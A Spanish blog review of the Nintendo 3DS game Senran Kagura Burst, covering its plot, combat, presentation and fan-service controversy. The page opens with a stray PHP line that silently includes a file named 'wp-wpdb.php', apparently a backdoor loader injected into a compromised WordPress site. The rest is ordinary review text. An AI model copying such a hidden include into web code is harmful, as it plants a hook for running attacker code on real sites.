if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Senran Kagura Burst para Nintendo 3DS – La Fortaleza de LeChuck

Análisis Senran Kagura Burst para Nintendo 3DS

Senran Kagura es una popular saga de videojuegos de acción donde vivimos las aventuras de unas jóvenes shinobi con grandes pechos. La saga aterrizó en Japón en 2011 con la primera entrega llamada Senran Kagura: Shoujo-tachi no Shinei para Nintendo 3DS, y un año más tarde, en 2012, se lanzaría su secuela, Senran Kagura Burst, la cual ha llegado este año a occidente rodeada de polémica. Diversión y fan service a raudales se dan cita en Senran Kagura Burst para Nintendo 3DS.

Senran-Kagura-Burst-analisis

Senran Kagura Burst cuenta las peripecias de unas estudiantes de una escuela privada, la cual generación tras generación ha entrenado secretamente a ninjas. Durante varios episodios disfrutaremos luchando contra yankis (chicas malotas) y otros criminales que asolan la paz de nuestra ciudad. Por otro lado, tenemos la facción de ninjas oscuras, a las que debemos hacer frente, e incluso podremos manejar y vivir el juego desde el lado del villano. En la trama principal jugaremos con la protagonista de cada bando, pero en las misiones secundarías seremos libres de elegir entre las diferentes chicas, teniendo todas ellas sus propias misiones de personaje. En el lobby de nuestra escuela, cambiaremos de personaje, además de elegir la indumentaria de cada una, ver videos, fotos y escuchar la música que vamos desbloqueando.

A pesar de que el fan service es continuo, no me pareció tan excesivo como muchos medios pintaban, obviamente está ahí, pero me ha parecido mucho más que un puñado de ninjas con exceso de delantera. Para empezar, y como he comentado, lo de poder jugar con las chicas malas y buenas es un tanto a favor y muestra el esfuerzo por ofrecer algo más que un buen par de grandes pechos. Si bien la trama de ambas historias es bastante simple, las chicas tienen una personalidad diferente y divertida y es fácil encariñarse con alguna (Me declaro fan total de Yagyuu). Cada personaje se desarrolla y evoluciona en cierta medida, y a través de cinco episodios, conoceremos lo que les motiva a seguir el camino del ninja. La diferencia entre la luz y la oscuridad estará presente durante todo el juego con constantes referencias al concepto del Yin Yang.

Senran-Kagura-Burst-2
Escuela Hebijo VS Escuela Hanzo

Mucha Acción

Senran Kagura Burst es un beat’ em up de scroll lateral. El sistema de combate es simple pero vistoso, con un puñado de ataques. Tenemos un botón para saltar, otro para correr, uno para el ataque normal y otro para el fuerte, con todo esto conseguiremos hacer numerosos combos locos. Además, cuando la barra especial se llene, podremos utilizar el super poder ninja de nuestro rollo, lo cual nos regalará una pequeña cinemática de super transformación a lo sexy magical girl. ¿Qué pasa si recibimos muchos golpes? Pues que desgraciadamente nuestra ropa se hará pedacitos y perderemos parte de nuestra defensa. También podemos sacrificar nuestra ropa para ir más fresquitas y conseguir ciertas ventajas como más agilidad.

Senran-Kagura-burst

A medida que progresamos en el juego, subiremos de nivel y obtendremos nuevos movimientos y habilidades, así como el desbloqueo de varios extras tales como imágenes y videos, música, ropa, y dos nuevo personajes. Una vez que una misión se ha completado, se puede rejugar para mejorar la nota de la misión o levear. El juego sin duda nos mantendrá ocupados con las 100 misiones divididas entre ambos grupos.

senran-kagura-busrt-4
Asuka versión ropa destrozada

Al principio la acción en Senran Kagura Burst es muy divertida, usar las diferentes técnicas y ver las transformaciones de las chicas es genial, pero tras varias horas se vuelve repetitivo, deseando terminar pronto los combates para volver a retomar la historia. El juego es extremadamente fácil, la IA de los enemigos es bastante simple así que finalizar las misiones para volver a la parte narrativa y diálogos no nos llevará mucho tiempo.

Gráficos y sonido

Gráficamente, Senran Kagura Burst se queda un poco corto. Cuando hay una gran cantidad de enemigos en la pantalla surgen algunos descensos de framerate pero no es me pareció tan espantoso como se decía. También hay que tener en cuenta que el juego salió cuando la 3DS estaba empezando a despegar. De todas formas, los gráficos aunque limitados son suaves y bonitos, todas las chicas se ven muy kawaii y la animación es más que correcta. El efecto 3D no está presente en la batalla, pero los diálogos y el vestuario admite la función, además del útil zoom con vista de 360º para ver de cerca los encantos. Senran Kagura Burst cuenta con escenas animadas bonitas y clips de película cual opening de anime. El diálogo conserva las geniales voces de las seiyuu originales japonesas, y tiene una cantidad bastante importante para lo que estamos acostumbrados en un juego de 3DS. Es maravilloso escuchar a las actrices de voz japonesas, su interpretación y pasión, sin ellas el juego no sería lo mismo. Con todo, la presentación es superior a la media y es un juego muy vistoso al puro estilo anime.

senran_kagura_burst-2325168
Cho kawaii ne!

La polémica está servida

El fan service (escenas de carácter sexual y personajes con atributos exagerados) y moe (personajes monos con aspecto de niña) se han convertido en los últimos años en un género propio dentro del mundo del manganime en Japón y cada vez es más habitual en los juegos, ya bien sea por adaptación de un anime o como un juego original, como en este caso, donde el anime llegó después del juego. En Senran Kagura Burst, los pechos cobran mucho protagonismo, superando en muchas ocasiones las leyes de la física, es decir, se mueven hasta con el viento. Todo esto, para los medios más conservadores y público que no está familiarizado con la cultura japonesa, puede resultar extraño, e incluso de mal gusto para este sector, que incluso ha tachado el juego de machista.

senran-kagura1

Los planos de escotes, los botes de pechera y dobles sentidos obviamente están ahí, forman parte del lado picante del juego y son un claro reclamo para el sector masculino, sobre todo para el japonés, pero público femenino también juega a estos juegos y se toma con humor la parte exagerada de su contenido. No soy muy fan del fan service pero en este caso considero que no es para tanto y se puede disfrutar de la jugabilidad y de la historia de las chicas ignorando lo otro sin problemas.

Lamentablemente, mucha gente pensará que Senran Kagura Burst es un juego que gira alrededor de los pechos de unas jovencita sin intentar ver más allá. Sin embargo, la historia simpática, el estilo bonito y la gran variedad de chicas hacen que Senran Kagura Burst merezca una oportunidad, especialmente entre los amantes del manga y el anime. La llegada de un juego como Senran Kagura Burst por Europa es una rareza, por lo que hay que contribuir a que este tipo de juegos tan típicamente japoneses crucen el charco y lleguen a occidente, aunque sea como en este caso en inglés.

Si buscas Senran Kagura Burst al mejor precio, lo tienes aquí